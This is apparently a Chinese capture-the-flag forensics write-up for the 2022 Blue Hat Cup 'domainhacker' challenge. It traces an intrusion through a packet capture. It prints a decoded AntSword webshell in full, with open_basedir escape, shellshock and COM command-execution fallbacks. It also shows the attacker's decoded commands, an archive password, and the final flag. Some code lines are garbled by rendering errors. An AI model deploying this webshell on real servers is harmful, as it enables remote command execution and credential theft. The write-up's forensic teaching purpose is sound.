[蓝帽杯 2022 初赛]domainhacker trackboy的WriteUp

1.过滤http协议，然后http数据量分析，发现传输的一段代码，对其进行url解密，然后json格式化

a = @ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=pre{g}_{s}plit("/;|:/",$opdir);
@array_push($oparr,$ocwd, sys_get_temp_dir());
foreach($oparras$item) {
if (!@is_writable($item)) {
continue;
};
$tmdir=$item.
"/.c46a89a";
@mkdir($tmdir);
if (!@file_exists($tmdir)) {
continue;
}
@chdir($tmdir);
@ini_set("open_basedir", "..");
KaTeX parse error: Undefined control sequence: \/ at position 29: …g_split("/\\\\|\̲/̲/", tmdir);
for ($i=0;$i < sizeof($cntarr);$i++) {
@chdir("..");
};
@ini_set("open_basedir", "/");
@rmdir($tmdir);
break;
};
};;

function asenc($out) {
return $out;
};

function asoutput() {
$output = ob_get_contents();
ob_end_clean();
echo "79c2".
"0b92";
echo @asenc($output);
echo "b4e7e".
"465b62";
}
ob_start();
try {
$p=base64_{d}ecode(substr($_POST["yee092cda97a62"], 2));
$s=base64_{d}ecode(substr($_POST["q8fb9d4c082c11"], 2));
$envstr=@base64_{d}ecode(substr($_POST["p48a6d55fac1b1"], 2));
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d, 0, 1) == "/" ? "-c "{KaTeX parse error: Expected 'EOF', got '}' at position 2: s}̲\"" : "/c \"{s}"";
if (substr($d, 0, 1) == "/") {
@putenv("PATH=".getenv("PATH").
":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
} else {
@putenv("PATH=".getenv("PATH").
";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
}
if (!empty($envstr)) {
$envarr=explode("|||asline|||",$envstr);
foreach($envarras$v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
KaTeX parse error: Expected '}', got 'EOF' at end of input: r = "{p} {$c}";

function fe($f) {
	$d = explode(",", @ini_get("disable_functions"));
	if (empty($d)) {
		$d = array();
	} else {
		$d = array_map('trim', array_map('strtolower', $d));
	}
	return (function_exists($f) && is_callable($f) && !in_array($f, $d));
};

function runshellshock($d, $c) {
	if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
		if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
			$tmp = tempnam(sys_get_temp_dir(), 'as');
			putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
			if (fe('error_log')) {
				error_log("a", 1);
			} else {
				mail("a@127.0.0.1", "", "", "-bv");
			}
		} else {
			return False;
		}
		$output = @file_get_contents($tmp);
		@unlink($tmp);
		if ($output != "") {
			print($output);
			return True;
		}
	}
	return False;
};

function runcmd($c) {
	$ret = 0;
	$d = dirname($_SERVER["SCRIPT_FILENAME"]);
	if (fe('system')) {
		@system($c, $ret);
	}
	elseif(fe('passthru')) {
		@passthru($c, $ret);
	}
	elseif(fe('shell_exec')) {
		print(@shell_exec($c));
	}
	elseif(fe('exec')) {
			@exec($c, $o, $ret);
			print(join("
						",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!=" / " && @class_exists("
						COM ")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r."
						2 > & 1 ");print ($ret!=0)?"
						ret = {
							$ret
						}
						":"
						";;}catch(Exception $e){echo "
						ERROR: //".$e->getMessage();};asoutput();die();&p48a6d55fac1b1=3G&q8fb9d4c082c11=8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4&yee092cda97a62=yqY21k
​
            
AI代码解释
            
                
            
        

2.分析发现该段代码为蚁剑木马。其中加密的字符串：8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4，对其进行base64解密发现不行，删除前面2位，一般base64以大写字母开头，可解密：

cd /d "C:/phpstudy_pro/WWW"&whoami /priv&echo efa923ba504&cd&echo 1a4be8815ef8

3.然后对tcp每个数据流进行分析，在追踪到tcp.stream eq 13时候，出现的加密的字符串：

Y2QgL2QgImM6XFxXaW5kb3dzXFxUZW1wIiZyYXIuZXhlIGEgLVBTZWNyZXRzUGFzc3cwcmRzIDEucmFyIDEudHh0JmVjaG8gZWZhOTIzYmE1MDQmY2QmZWNobyAxYTRiZTg4MTVlZjg%3D（删除前面2位）

4.解密base64得到的字符串：

cd /d "c:\Windows\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8

密码为：SecretsPassw0rds

5.导出http对象---http中的rar

6.发现解压需要密码，使用上面得到的密码：SecretsPassw0rds,可解码出来，得到mimikatz获取的hash值

7.最终flag:

NSSCTF{416f89c3a5deb1d398a1a1fce93862a7}